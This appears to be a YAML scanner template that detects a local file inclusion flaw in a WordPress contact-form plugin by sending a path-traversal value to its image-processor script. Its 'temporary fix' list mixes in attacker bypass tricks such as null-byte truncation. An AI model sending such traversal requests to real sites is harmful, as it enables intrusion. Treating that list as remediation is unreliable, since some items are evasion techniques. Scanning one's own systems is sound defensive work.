id: Wordpress-NMedia_Website_Contact_Form-FileInclude
info:
  name: Wordpress_N-Media_Website_Contact_Form_with_File_Upload_1.5_Local File Include
  author:
  - l0ne1y
  description: |+
    WordPress Plugin N-Media_Website_Contact_Form-FileInclude 1.5 file inclusion vulnerability
    WordPress is a blog platform developed by the WordPress Software Foundation using the PHP language. The platform supports the establishment of personal blog websites on PHP and MySQL servers. N-Media file uploader is one of the file upload plug-ins.

    A file inclusion vulnerability exists in version 1.5 of the WordPress N-Media file uploader plugin. A remote attacker can perform file inclusion attacks through the demo parameter.

  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/

    Temporary fix:
    1. Use open_basedir configuration in PHP to restrict access to specified areas and truncate the path length.
    2. Filter. (dot)/(backslash)\\(backslash), encoding bypass
    3. Disable server remote file inclusion
    4. For the situation where the included file suffix is ​​restricted, the PHP version is less than 5.3, php.ini magic_quotes_gpc = off, and the addslashes function is not used for controllable parameters. If these three conditions are met, %00 truncation can be used.
    5. Question mark, pound sign, and space bypass (remote)
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"<h1>Wide Image filters</h1>")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=./../test'
  method: GET
